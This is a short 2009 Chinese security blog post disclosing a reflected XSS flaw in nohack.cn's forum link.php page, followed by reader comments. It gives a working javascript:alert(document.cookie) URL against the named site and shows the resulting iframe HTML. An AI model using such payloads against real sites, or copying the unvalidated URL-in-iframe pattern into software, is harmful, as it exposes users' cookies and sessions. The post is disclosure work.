Nohack XSS

2009年7月31日发表评论阅读评论

link.php页面不是Dz论坛自带的，是nohack自己写的，虽然用 htmlspecialchars 函数进行处理了， php.ini配置里gpc也开了，虽然没办法通过闭合进行xss，但是nohack却忘记了javascript伪协议放在资源请求里面会被执行：

http://www.nohack.cn/bbs/link.php?link=javascript:alert(document.cookie)

页面内容：

<iframe id="url_mainframe" frameborder="0" scrolling="yes" name="main" src="javascript:alert(document.cookie)" style="height: 100%; visibility: inherit; width: 100%; z-index: 1;overflow: visible;"></iframe>

这种方式还是很多呀！！

转载请注明：woyigui's blog [http://www.woyigui.cn/]
本文标题：Nohack XSS
本文地址：http://www.woyigui.cn/2009/07/31/nohack-xss/

woyigui 分类: 网络安全标签: nohack, xss, 跨站

评论 (3) Trackbacks (0) 发表评论 Trackback

randsafe

2009年7月31日07:37 | #1

回复 | 引用

鬼友最近学习什么呢？

[回复]
woyigui 回复:
七月 31st, 2009 at 上午 8:06
who are you ?

[回复]
sH

2009年7月31日08:42 | #2

回复 | 引用

顶！

[回复]
无心

2009年8月12日08:08 | #3

回复 | 引用

呵呵，空气修复漏洞的速度还是蛮快的么～～～～

[回复]

本文目前尚无任何 trackbacks 和 pingbacks.

可恶的AntiVir以及McAfee milw0rm in china

WoYiGui's BloG | 关注安全测试

Nohack XSS

最新推荐

猜你喜欢

最新评论

WoYiGui's BloG | 关注安全测试

Nohack XSS

最新推荐

猜你喜欢

最新评论

标签云